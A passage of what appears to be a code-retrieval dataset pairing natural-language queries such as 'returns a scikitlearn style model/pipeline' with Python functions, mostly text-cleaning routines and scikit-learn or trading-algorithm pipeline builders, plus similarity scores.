= re.sub(\"Mr\\.\", 'Mr', str(text))\n text = re.sub(\"Mrs\\.\", 'Mrs', str(text))\n # removing any reference to outside text\n text = re.sub(\"[\\(\\[].*?[\\)\\]]\", \"\", str(text))\n\n return text", "def clean_text(text):\n\n\n regex = re.compile('[\\.|\\-|\\,|\\?|\\_|\\:|\\\"|\\)|\\(\\)\\/|\\\\|\\>|\\<]')\n text = text.lower() # Turn everything to lower case\n text = regex.sub(' ', text).strip()\n out = re.sub(' +', ' ', text) # Reduce whitespace down to one\n \n return out", "def clean_the_text(text):\n \n #Replace non-word characters with empty space\n text = re.sub('[^A-Za-z0-9\\s]', ' ', text)\n \n #Remove punctuation\n text = ''.join([word for word in text if word not in string.punctuation])\n \n #Bring text to lower case\n text = text.lower()\n \n #Tokenize the text\n tokens = re.split('\\W+', text)\n \n #Remove stopwords\n text = [word for word in tokens if word not in stopword]\n \n #Lemmatize the words\n text = [wn.lemmatize(word) for word in text]\n \n #Return text\n return text", "def remove_diacritics(self, text):\n text = re.sub(self._arabic_diacritics, '', text)\n return text", "def clean_text(text):\n text = text.lower()\n text = text.replace('\\xa0', ' ')\n text = text.replace('fls.', 'folhas ')\n text = text.replace('fl.', 'folha ')\n text = text.replace('arts.', 'artigos ')\n text = text.replace('art.', 'artigo ')\n text = re_tree_dots.sub('...', text)\n text = re.sub(r'\\.\\.\\.', ' ', text)\n text = re_remove_brackets.sub(' ', text)\n text = re_changehyphen.sub('-', text)\n text = re_remove_html.sub(' ', text)\n text = re_transform_numbers.sub('0', text)\n text = re_transform_url.sub('URL', text)\n text = re_transform_emails.sub('EMAIL', text)\n text = re_quotes_1.sub(r'\\1\"', text)\n text = re_quotes_2.sub(r'\"\\1', text)\n text = re_quotes_3.sub('\"', text)\n text = re.sub('\"', ' ', text)\n text = re_dots.sub('.', text)\n text = re_punctuation.sub(r'\\1', text)\n text = re_hiphen.sub(' - ', text)\n text = re_punkts.sub(r'\\1 \\2 \\3', text)\n text = re_punkts_b.sub(r'\\1 \\2 \\3', text)\n text = re_punkts_c.sub(r'\\1 \\2', text)\n text = re_doublequotes_1.sub('\\\"', text)\n text = re_doublequotes_2.sub('\\'', text)\n text = re_trim.sub(' ', text)\n return text.strip()", "def clean_text(text):\n text = str(text).lower()\n text = text.strip(string.punctuation)\n text = re.sub(\"&amp;\", '', text)\n text = re.sub(\"https\", '', text)\n text = re.sub('\\W\\s', '', text)\n text = re.sub('\\s,\\W', '', text)\n text = re.sub('[.!@#$%^&*()_,:;/-]', '', text)\n text = re.sub(\"\\d+\", '', text)\n\n return text", "def _strip_text(text):\n text = re.sub(r'[ ,?:]|%s', \"\", text.lower())\n for chr in \"-%\":\n new_text = text.replace(chr, \"\")\n if new_text:\n text = new_text\n return text.lower()", "def clean_text(text):\n global cleaned_text\n # remove numbers\n text_nonum = re.sub(r'\\d+', '', text)\n # remove punctuations and convert characters to lower case\n text_nopunct = \"\".join([char.lower() for char in text_nonum if char not in string.punctuation]) \n # substitute multiple whitespace with single whitespace\n # Also, removes leading and trailing whitespaces\n text_no_doublespace = re.sub('\\s+', ' ', text_nopunct).strip()\n #tokenise text\n tokenised_text = text_no_doublespace.split()\n for word in tokenised_text:\n if len(word) == 1:\n tokenised_text.remove(word)\n #if word is a stop word, remove it from the list\n elif word in stopwords.words('english'):\n tokenised_text.remove(word)\n #de-tokenise text\n cleaned_text = ' '.join(tokenised_text)\n return cleaned_text", "def clean_text(text):\n text = text.replace(\"\\uf0b7\", \" \")\n text = text.replace(\":\", \" \")\n text = text.replace(\".\", \" \")\n text = text.replace(\",\", \" \")\n text = text.replace(\"/\", \" \")\n text = text.replace(\"(\", \" \")\n text = text.replace(\")\", \" \")\n text = text.replace(\"[\", \" \")\n text = text.replace(\"]\", \" \")\n text = text.replace(\"+\", \" \")\n text = text.replace(\"?\", \" \")\n text = text.replace(\"*\", \" \")\n text = text.replace(\"#\", \" \")\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n text = re.sub(\" $\", \"\", text)\n return text", "def remove_non_alpha(self,text):\n \n removelist=\"-\\.\\/\\?\\@\"\n re_alpha_numeric1=r\"[^0-9a-zA-Z\"+removelist+\" ]\"\n clean_text=re.sub(re_alpha_numeric1,'',text)\n clean_text=clean_text.replace('/',' ')\n clean_text=re.sub(' +', ' ', clean_text)\n return clean_text", "def clean_text(txt):\n\n for symbol in \"\"\".,'?!()/-:;\"\"\":\n txt = txt.replace(symbol, '')\n txt = txt.lower()\n txt = txt.split()\n return txt", "def remove_nonalpha(text):\n text = ''.join(c for c in text if c.isalpha() or c == ' ')\n return re.sub(\" +\", \" \", text)", "def strip(self, str_text):\n punct_chars = [' ', '.', ',', '!', '?', '&', '\"', \"'\", '-', ':']\n str_text = [i for i in str_text if i not in punct_chars]\n str_text = ''.join(str_text)\n return str_text", "def clean_text(text):\n text = text.lower() # Convert the text to lower case\n text = re.sub(\",\", \" \", text) # Replace commas with an extra space\n\n text = re.sub(\"<.*?>\", \"\", text) # Clean out any HTML tags\n text = re.sub(\"\\s+\", \" \", text) # Replace multiple spaces with\n\n text = text.split()\n\n text = [\n re.sub(\"[^\\w]\", \"\", i.rstrip()) for i in text if i not in all_stopwords\n ] # Clean out stopwords\n\n # text = engStem.stemWords(text)# English Stemming\n\n text = \" \".join(text)\n return text", "def remove_special_chars(text):\n schars = ''.join([a for a in string.punctuation if a not in \".,?\"])\n\n text = re.sub('[%s]' % re.escape(schars), '', text)\n return text", "def remove_spurious_words(text):\n spurious_words = [\"Cached\", \"Similar\", '的']\n for word in spurious_words:\n text = text.replace(word, \"\")\n return re.sub('[.、”“::a-zA-Z%?=()()—「 /-]', ' ', text)", "def remove_special_characters(text, remove_digits=False):\n pattern = r'[^a-zA-z0-9\\s]' if not remove_digits else r'[^a-zA-z\\s]'\n text = re.sub(pattern, '', text)\n return text", "def clean(text):\n return re.sub(REGEX, \"\", text).strip() + \"\\n\"", "def sanitize_text(text: str) -> str:\n for r in [RE_NOISE, RE_EMAIL, RE_REFERENCE]:\n text = r.sub(\"\", text)\n return text", "def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text", "def removePunctuation(text):\n return re.sub(r'[^A-Za-z0-9 ]', ' ', text).strip()", "def clean_text(content):\n bad_chars = [\n \"<i>\",\n \"</i>\",\n \"<br />\",\n \"<b>\",\n \"</b>\",\n \"<\",\n \">\",\n \"\\\\\"\n ]\n\n for char in bad_chars:\n if char in content:\n content = content.replace(char, \"\")\n return content", "def remove_noise(text):\n text1 = re.sub(\"[\\t\\r\\s]\", \" \",text)\n text1 = \" \" + text1\n text2 = re.sub(r\"([ \" + string.punctuation + \"]+)[^a-zA-Z ]+\", \"\\g<1> \", text1)\n return text2", "def remove_punctuation(text):\n text = re.sub(r'[^\\w\\s]', ' ', text)\n return text", "def remove_punctuation(text):\n return re.sub(r'[^\\w]', ' ', text)", "def cleanText(text):\n try:\n text = str(text)\n\n # remove contactions and stop words\n text = contractions(text)\n # remove html entities\n cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')\n new_text = cleanr.sub('', text.strip())\n return re.sub(r'\\s+', ' ', re.sub(r'\\W+', \" \", new_text))\n # TAG_RE = re.compile(r'<[^>]+>')\n except:\n print(\"An exception occurred with: \" + text)\n return str(text)", "def clean(word):\n word = word.lower()\n stopwords = ['of', 'and','to', 'at', 'in', '@']\n word = re.sub(r'[\\&/\\-\\(\\)\\|\\@,\\]\\[]+', ' ', word)\n for stopword in stopwords:\n pattern = r'\\b' + stopword + r'\\b'\n pattern = re.compile(pattern)\n word = re.sub(pattern, '', word)\n word = re.sub(r'\\s\\s+', ' ', word)\n return word", "def text_prepare(text):\r\n\r\n replace_by_space_re = re.compile('[/(){}\\[\\]\\|@,;]')\r\n good_symbols_re = re.compile('[^0-9a-z #+_]')\r\n stopwords_set = set(stopwords.words('english'))\r\n\r\n text = text.lower()\r\n text = replace_by_space_re.sub(' ', text)\r\n text = good_symbols_re.sub('', text)\r\n text = ' '.join([x for x in text.split() if x and x not in stopwords_set])\r\n\r\n return text.strip()", "def _replace_non_alnum(self):\n no_punct = [x if x.isalnum() else ' ' for x in self._phrase.lower()]\n return ''.join(no_punct) # Convert an array of char to string", "def clean_text(text):\n return(re.sub(\" {2,}|\\r|\\n\",\"\", text))", "def scrub_words(text):\n \"\"\"Taken from https://github.com/kavgan/nlp-in-practice/blob/master/text-pre-processing/Text%20Preprocessing%20Examples.ipynb \"\"\"\n \n # remove html markup\n text=re.sub(\"(<.*?>)\",\"\",text)\n \n #remove non-ascii and digits\n text=re.sub(\"(\\\\W|\\\\d)\",\" \",text)\n \n # remove the extra spaces that we have so that it is easier for our split :) Taken from https://stackoverflow.com/questions/2077897/substitute-multiple-whitespace-with-single-whitespace-in-python\n text=re.sub(' +', ' ', text).strip()\n return text", "def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text", "def clear_punctuation(document):\n return re.sub(r'\\D', '', str(document))", "def remove_punctuation(text):\n return re.sub('[,.?\";:\\-!@#$%^&*()]', '', text)", "def clean_text_for_skill_extraction(text):\n multi_space_regex = re.compile(r\"[,;?!()\\\\/]\", re.IGNORECASE)\n text = re.sub(multi_space_regex, ' ', text)\n\n text = clean_text_from_private_unicode(text)\n text = clean_text_from_geometrical_shape_unicode(text)\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n return text", "def punct_remove(text):\n return(re.sub(punct_characters,' ',text))", "def get_clean_text(messy_text: str) -> str:\n new_text = \"\"\n replace = {\n \"*\": \"\\\"\",\n \"!\": \"?\",\n \"/\": ',',\n \"?\": \"!\"\n }\n remove = \"1234567890&@#$%^()_+|><~\"\n pls_do_upper = False\n for l in messy_text:\n if l in replace:\n new_text += replace[l]\n elif l not in remove:\n if pls_do_upper:\n new_text += l.upper()\n else:\n new_text += l\n return new_text", "def clean_text(text: Any) -> str:\n return textwrap.dedent(str(text)).strip()", "def clean_text_from_general_punctuation_unicode(text):\n return re.sub(r\"([\\u2000-\\u206F])\", \" \", text)", "def clean_text_from_general_punctuation_unicode(text):\n return re.sub(r\"([\\u2000-\\u206F])\", \" \", text)", "def remove_punctuation(text):\n bad_characters = [\".\", \",\", \";\", \"!\", \"?\", \":\", \"(\", \")\", \"-\", \"/\", \"*\",\n \"' \", \" '\", '\"', \"&\"]\n for bad_character in bad_characters:\n text = text.replace(bad_character, \"\")\n return text.lower()", "def _remove_special_chars(self, doc: str):\n processed_tweet = re.sub('[\\.,!#¡\\?¿%:;´\"@”“&()\\|]', '', doc)\n return processed_tweet", "def _clean(text, remove_stopwords=False):\n text = _remove_between_square_brackets(text)\n text = _replace_contractions(text)\n \n words = nltk.word_tokenize(text)\n words = _remove_non_ascii(words)\n words = _to_lowercase(words)\n words = _remove_punctuation(words)\n words = _replace_numbers(words)\n\n if remove_stopwords:\n words = _remove_stopwords(words)\n\n return ' '.join(words)", "def clean_word(self, word):\n return self.filter_pattern.sub(u'', word.lower())", "def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text", "def remove_apostrophes(text: str) -> str:\n apostrophes_re = re.compile(\"'\")\n return apostrophes_re.sub(' ', text)", "def remove_punctuation(self):\n new_words = []\n # new_words = \"\"\n for word in self.words:\n new_word = re.sub(r'[^\\w\\s]', '', word)\n if new_word != '':\n new_words.append(new_word)\n # new_words += f\"{new_word} \"\n self.words = new_words\n return self", "def clean_text(text):\n return text.replace('\\n', ' ').replace('\\r', ' ')", "def remove_tokens(self, text):\r\n\r\n return text.replace(self.PAD_TK, \"\").replace(self.UNK_TK, \"\")", "def cleanString(self, s):\r\n s = s.lower()\r\n for x in s: \r\n if x in punctuation:\r\n s = s.replace(x, '')\r\n return s", "def _remove_diacritics(self, text: str) -> str:\n nfkd_form = unicodedata.normalize(\"NFKD\", text)\n return \"\".join([char for char in nfkd_form if not unicodedata.combining(char)])", "def clean_text(txt):\n\n alphabet= 'abcdefghijklmnopqrstuvwxyz '\n\n ALPHABET= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ '\n\n new_words=''\n \n for i in txt:\n if i in alphabet or i in ALPHABET:\n new_words+= i\n\n clean=new_words.lower().split()\n\n return clean", "def clean_training_text(txt):\n return re.sub('[^A-Za-z0-9]+', ' ', str(txt)).strip()", "def CleanText(text):\n\n pretty_issue = text.lower().strip()\n\n quoteless_issue = re.sub('\\'', '', pretty_issue)\n no_punctuation_issue = re.sub('[^\\w\\s]|_+', ' ', quoteless_issue)\n one_space_issue = ' '.join(no_punctuation_issue.split())\n\n return one_space_issue", "def clean_text(some_text):\n # import re\n some_clean_text = re.sub(r'\\n|\\t', '', some_text) # Remove new line and tabs\n some_clean_text = re.sub(' +', ' ', some_clean_text) # Replace multiple spaces with one space\n return some_clean_text", "def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])", "def _clean(self, texts, no_punc=False):\n result = ''\n sw = self._sw_no_punc_dict if no_punc else self._sw_dict\n for t in texts:\n if t not in sw:\n result += t\n return result", "def clean_word(word: str) -> str:\n\n cleaned_word = ''\n for char in word.lower():\n if char.isalnum():\n cleaned_word = cleaned_word + char\n return cleaned_word", "def clean_review(self, text):\n text = text.lower() # lowercase capital letters\n\n if self.remove_stopwords:\n text = self.remove_stopwords_f(text, keep_neg_words=True)\n\n text = re.sub('[^a-zA-Z]+', ' ', text) # select only alphabet characters (letters only)\n # text = re.sub('[^a-zA-Z0-9]+', ' ', text) # select only alphanumeric characters (letters & numbers)\n # text = re.sub(r'\\W+', ' ', text) # Select only alphanumeric characters (including greek & underscore)\n\n text = re.sub(' +', ' ', text) # remove extra spaces\n\n if self.apply_normalization:\n text = self.normalize_text(text)\n\n return text", "def remove_puncts(text):\n # regex rocks\n #return re.sub('[%s]'%PUNCTS, ' ', text)\n return REMOVE_PUNCTS_RE.sub(' ', text)", "def clean_up_text(text):\n text = html.unescape(text)\n return remove_emoji(text)", "def removeApostrophes(self, words):\n\t\treturn self.__apostropheRegex.sub('', words)" ]
[ "0.788221", "0.77547354", "0.76948416", "0.7690904", "0.76164234", "0.76150995", "0.76150995", "0.76150995", "0.76150995", "0.76150995", "0.76150995", "0.75909275", "0.7558085", "0.7538756", "0.75204813", "0.75020224", "0.74994344", "0.7429214", "0.73992103", "0.73870385", "0.73750395", "0.736514", "0.7348014", "0.7343082", "0.73056155", "0.72943497", "0.7290857", "0.7284003", "0.7243742", "0.7229692", "0.72105587", "0.71983653", "0.71956676", "0.7195185", "0.7194841", "0.71887636", "0.71755725", "0.7123536", "0.7107823", "0.71029174", "0.71013856", "0.70503026", "0.70256656", "0.7017799", "0.7014829", "0.7005056", "0.69955915", "0.6986028", "0.6972711", "0.69688404", "0.69649935", "0.69369334", "0.6933182", "0.6931206", "0.6930173", "0.6917457", "0.6885875", "0.68855447", "0.6883252", "0.6872537", "0.68484724", "0.6832282", "0.68273264", "0.6825463", "0.6823997", "0.6818732", "0.6817686", "0.6811743", "0.6803135", "0.68009484", "0.6793261", "0.67824864", "0.678108", "0.6777722", "0.67756706", "0.67713076", "0.67713076", "0.6760601", "0.6746043", "0.6714406", "0.6711266", "0.6705661", "0.6696278", "0.6687402", "0.66814876", "0.6666233", "0.66657925", "0.66653633", "0.66624296", "0.66243494", "0.6619843", "0.6619", "0.6574183", "0.6573485", "0.6564896", "0.65640604", "0.65427446", "0.65407133", "0.6527284" ]
0.72454876
29
returns a scikitlearn style model/pipeline
def get_model(name): try: from .model_defs import get_model_from_def model = get_model_from_def(name) logger.info("Model {n} loaded from model_defs module".format(n=name)) except NameError: try: model = get_model_from_yaml(name) logger.info("Model {n} loaded from yaml".format(n=name)) except KeyError: try: from .model_defs import parse_model_name model = parse_model_name(name) logger.info("Model {n} parsed from name".format(n=name)) except NameError: sys.exit("Unknown model {n}".format(n=name)) if not hasattr(model, 'name'): model.name = name return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_pipeline():\n universe = TradableStocksUS('Real Estate') | TradableStocksUS('Utilities') | \\\n TradableStocksUS('Consumer Staples') | TradableStocksUS('Technology') | \\\n TradableStocksUS('Financials') | TradableStocksUS('Energy') | \\\n TradableStocksUS('Materials') | TradableStocksUS('Health Care') | \\\n TradableStocksUS('Industrials') | TradableStocksUS('Consumer Discretionary') | \\\n TradableStocksUS('Communications')\n\n roic = shfd.slice(dimension='MRT', period_offset=0).ROIC.latest\n ebit = shfd.slice(dimension='MRQ', period_offset=0).EBIT.latest\n ev = shfd.slice(dimension='MRQ', period_offset=0).EV.latest\n volatility = AnnualizedVolatility(window_length=100)\n value = ebit / ev\n\n roic_rank = roic.rank(mask=universe)\n value_rank = value.rank(mask=universe)\n volatility_rank = volatility.rank(mask=universe, ascending=False)\n\n spy_ma100_price = SMA(inputs=[USEquityPricing.close], \n window_length=100)[algo.sid(\"FIBBG000BDTBL9\")]\n spy_price = USEquityPricing.close.latest[algo.sid(\"FIBBG000BDTBL9\")]\n\n momentum_score = MomentumScore()\n\n overall_rank = roic_rank + value_rank + volatility_rank\n\n # seven_month_returns = Returns(window_length=148, mask=universe,)\n # one_month_returns = Returns(window_length=30, mask=universe,)\n\n pipeline = Pipeline(\n columns={\n 'stock' : master.SecuritiesMaster.Symbol.latest,\n 'sid': master.SecuritiesMaster.Sid.latest,\n 'sector' : master.SecuritiesMaster.usstock_Sector.latest,\n 'average_dollar_volume': AverageDollarVolume(window_length=200),\n 'price': EquityPricing.close.latest,\n 'volume': EquityPricing.volume.latest,\n 'roic' : roic,\n 'value' : value,\n 'volatility': volatility,\n 'roic_rank' : roic_rank,\n 'value_rank' : value_rank,\n 'momentum': momentum_score,\n 'momentum_decile': momentum_score.deciles(),\n 'volatility_decile' : volatility.deciles(),\n 'overall_rank' : overall_rank,\n 'overall_rank_decile': overall_rank.deciles(),\n 'trend_filter': spy_price > spy_ma100_price,\n # 'returns' : one_month_returns - seven_month_returns\n }, \n screen = universe\n )\n\n return pipeline", "def get_pipeline(tag=None):\n\n\n data_science_pipeline = (\n # interdiction_baseline_call_pl()\n # + interdiction_baseline_parse_pl()\n #+ interdiction_community_pl()\n #+ interdiction_community_parse_pl()\n #+ dijkstra_prep_paths_pl()\n #+ dijkstra_parse_paths_pl()\n #+ dijkstra_reachable_pl()\n #+ dijkstra_shortest_paths_pl()\n + dijkstra_pypy_pickle_pl()\n + dijkstra_pypy_paths_pl()\n + dijkstra_make_adj_pl()\n #+ dijkstra_opt()\n + dijkstra_flow()\n + sds_counterfactual_pl()\n + supply_interdiction_pl()\n + post_supply_interdiction_pl()\n )\n \n if tag:\n if type(tag)==str:\n return Pipeline([n for n in data_science_pipeline.nodes if tag in n.tags])\n elif type(tag)==list:\n return Pipeline([n for n in data_science_pipeline.nodes if len(n.tags - set(tag)) < len(n.tags)])\n \n else:\n return data_science_pipeline", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def get_pipeline(self):\n if hasattr(self, \"pipeline\"):\n return self.pipeline\n steps = [\n # before preprocessor, comes the feature extractor\n ('extractor', TurkishFeatureExtractor()),\n # first the pre-processor\n (\"preprocessor\", TurkishPreprocessor(self.stemmer_name_to_method[self.stemmer_method])),\n (\"vectorizer\", TurkishVectorizer(self.feature_name_to_class[self.feature])),\n # use pca\n # (\"pca\", TruncatedSVD(n_components=20, n_iter=10)),\n (\"adder\", TurkishFeatureAdder(n_components=20, n_iter=10)),\n (\"model\", self.model_name_to_class[self.model])\n ]\n self.pipeline = Pipeline(steps)\n return self.pipeline", "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n return pipeline", "def model(self) -> PipelineModel:\n return self._model", "def make_pipeline():\n # exchange = Fundamentals.exchange_id.latest\n # nyse_filter = exchange.eq('NYS')\n symbol_filter = StaticSids([TRADING_SID])\n set_benchmark(TRADING_SID) \n # volume_filter = VolumeFilter(\n # inputs=[USEquityPricing.volume],\n # window_length=1,\n # mask=symbol_filter\n # )\n\n # is_setup = volume_filter & alpha_long_weekly & alpha_long_daily\n weekly_high = WeeklyHigh(\n inputs=[USEquityPricing.high],\n mask=symbol_filter\n )\n weekly_low = WeeklyLow(\n inputs=[USEquityPricing.low],\n mask=symbol_filter\n )\n weekly_classifier = WeeklyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n )\n daily_classifier = DailyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n\n )\n\n pipe = Pipeline(\n screen=symbol_filter, # & (daily_classifier > 0),\n columns={\n 'daily_classifier': daily_classifier,\n 'daily_high': USEquityPricing.high.latest,\n 'daily_low': USEquityPricing.low.latest,\n 'weekly_classifier': weekly_classifier,\n 'weekly_high': weekly_high,\n 'weekly_low': weekly_low\n }\n )\n return pipe", "def make_pipeline():\r\n\r\n # Custom universe containing only desired assets (stocks with flag data)\r\n universe = StaticSids(my_stocks)\r\n\r\n return Pipeline(\r\n columns={\r\n #'flag_type': algo_data_full.flag_type.latest,\r\n #'flag_price': algo_data_full.flag_price.latest,\r\n #'end_flag_date': algo_data_full.end_flag_date.latest,\r\n #'end_flag_price': algo_data_full.end_flag_price.latest,\r\n 'up_flags': flag_counts.up.latest,\r\n 'down_flags': flag_counts.down.latest,\r\n 'up_ratio': up_ratios_2.up_ratio.latest,\r\n 'close': USEquityPricing.close.latest,\r\n },\r\n screen=universe\r\n )", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def build_model():\n pipeline = Pipeline([\n ('vectorizer', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n # (), # Feature engineering (word2vec/GloVe)\n (\"clf\", MultiOutputClassifier(RandomForestClassifier(n_estimators=100), n_jobs=-1))\n ])\n\n return pipeline", "def run(self):\n pipeline = set_pipeline()\n pipeline.fit(self.X_train, self.y_train)\n return pipeline", "def similar_bonds_pipeline():\n pipeline = Pipeline(\n steps=[\n ('scaler', StandardScaler()),\n #('encoder', OneHotEncoder()),\n ('pca', PCA(n_components=3)),\n ('knn', KNN()),\n ]\n )\n return pipeline", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n pipeline = Pipeline([('cvect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LinearSVC(multi_class=\"crammer_singer\"), n_jobs=1))\n ])\n\n parameters = {\n 'clf__estimator__C': 1,\n 'clf__estimator__max_iter': 1000 }\n \n model = GridSearchCV(pipeline, param_grid=parameters)\n\n\n return model", "def get_model_pipeline_from_file(self, oc):\r\n # Load model related files\r\n model_path = self.config['DATA_PATH'] + self.config['CUSTOMER_NAME'] + '/models/'\r\n\r\n model_file = model_path + self.task + '_' + str(oc) + '_pipeline.joblib'\r\n\r\n if os.path.isfile(model_file):\r\n model = joblib.load(model_file)\r\n return model\r\n return None", "def make_pipeline(context):\n \n # Base universe set to the Q1500US\n base_universe = Q500US()\n \n #Get all industry codes\n industry=morningstar.asset_classification.morningstar_industry_code.latest\n #Get all sector codes\n sector = Sector()\n \n # Create filters (to be used as masks) of different industries/sectors \n # This is the mask that should exclude the most stocks. \n # Note that these may need to be even further filtered to exclude securities outside of a \n # similar range of volumes/size. For instance, the defense sector stock provides stocks as large as # LMT but also small defense companies. Although this shouldn't matter due to the second filter of \n # crosscorrelation, this may be unnecassary computational expense. \n pipe=Pipeline()\n #Below forms a \"sentiment screen\" that takes only stocks that have been rated a certain number of times and of those ratings there are at least 2.85 times as many bull scored messages as there are bear scored messages. \n pipe.add(st.bull_scored_messages .latest, 'bull_scored_messages')\n pipe.add(st.bear_scored_messages .latest, 'bear_scored_messages')\n sentimentScreen=(((st.bull_scored_messages.latest) > (context.Sentiment_multiplier*st.bear_scored_messages.latest)) & (st.bear_scored_messages.latest > 5))\n \n dFilt=sector.eq(310) #Indicates aerospace/defense sector\n dFilt2=industry.eq(31052107) #Indicates aerospace/defense industry\n tFilt=sector.eq(311) #Indicates consumer electronics sector\n tFilt2=industry.eq(31167138) #Indicates consumer electronics industry \n cFilt=sector.eq(101) #Chemical sector\n cFilt2=industry.eq(10103003)\n aFilt=sector.eq(102)\n aFilt2=industry.eq(10209017) #Auto manufacturing industry\n depFilt2=industry.eq(10217034) #Department store industry\n #dFilt2,tFilt2,cFilt2,aFilt2=True,True,True,True #Remove industry requirement\n defenseFilt= dFilt & dFilt2 #Combination of filters\n techFilt= tFilt & tFilt2\n chemFilt = cFilt & cFilt2 \n autoFilt = aFilt & aFilt2 \n tradable=base_universe & (defenseFilt | techFilt | chemFilt | autoFilt | depFilt2) & sentimentScreen\n \n \n pipe.set_screen(tradable)\n pipe.add(defenseFilt,'defenseFilt')\n pipe.add(techFilt,'techFilt')\n pipe.add(chemFilt,'chemFilt')\n pipe.add(autoFilt,'autoFilt')\n pipe.add(depFilt2,'depFilt')\n \n \n \n #TODO: May also want to return stock sentiment data and further filter tuple couples by only accepting couples with sentiment data in a similar range (further attributing to the validity of the calculated cross-correlation)\n \n return pipe", "def make_pipeline():\r\n base_universe = Q1500US()\r\n sector = Sector() \r\n # screen is based off of returns\r\n returns = Returns(window_length = 2)\r\n # check if stock price has good strength, but not necessarily overbought\r\n rsi = RSI() \r\n price = USEquityPricing.close.latest\r\n # creating filter by specifying the type of returns desired\r\n top_return_stocks = returns.top(1,mask=base_universe, groupby=sector)\r\n pipe = Pipeline(\r\n columns = {\r\n 'rsi': rsi,\r\n 'price': price\r\n },\r\n # filter top return stocks, and stocks that are not being overbought\r\n # but are not too oversold either\r\n screen = base_universe & top_return_stocks & (20 < rsi < 80)\r\n # the above is equivalent to: choose stocks from the base universe that have had the top returns in their sectors and have a good RSI value\r\n )\r\n return pipe", "def build_model():\n nltk.download(['punkt', 'wordnet', 'averaged_perceptron_tagger', 'stopwords'])\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer())\n ])),\n \n ('strarting_verb', StartingVerbExtractor())\n \n ])),\n\n ('clf', MultiOutputClassifier(estimator = AdaBoostClassifier(random_state = 42)))\n\n ])\n \n parameters = {\"clf__estimator__learning_rate\": [0.1, 0.5, 1.0],\n \"clf__estimator__n_estimators\": [25, 50, 75]\n }\n \n from sklearn.model_selection import GridSearchCV\n cv = GridSearchCV(pipeline, param_grid = parameters) \n \n return cv", "def _get_pipeline(self, params_dict):\n p = Pipeline(steps=[('normalise', StandardScaler()),\n ('add_noise', NoiseAdder()),\n ('dim_reduce', PCA()),\n ('cluster', KMeans())])\n p.set_params(**params_dict)\n return p", "def find_correct_pipeline(data_name):\n\n if data_name == 'GSE13355':\n pipeline = PL.make_pipeline(\n PP.Binarizer(threshold=0.7000000000000001),\n E.RandomForestClassifier(bootstrap=False, criterion=\"entropy\", max_features=0.35000000000000003,\n min_samples_leaf=3, min_samples_split=18, n_estimators=100)\n )\n elif data_name == 'GSE14905':\n pipeline = PL.make_pipeline(svm.LinearSVC(C=5.0, dual=True, loss=\"squared_hinge\", penalty=\"l2\", tol=0.001))\n elif data_name == 'GSE27887':\n pipeline = PL.make_pipeline(T.DecisionTreeClassifier(criterion=\"gini\", max_depth=4, min_samples_leaf=1, min_samples_split=10))\n elif data_name == 'GSE30999':\n pipeline = PL.make_pipeline(N.KNeighborsClassifier(n_neighbors=9, p=2, weights=\"distance\"))\n elif data_name == 'GSE32924':\n pipeline = PL.make_pipeline(E.GradientBoostingClassifier(learning_rate=1.0, max_depth=8, max_features=0.7500000000000001, min_samples_leaf=4,\n min_samples_split=3, n_estimators=100, subsample=0.7000000000000001))\n\n elif 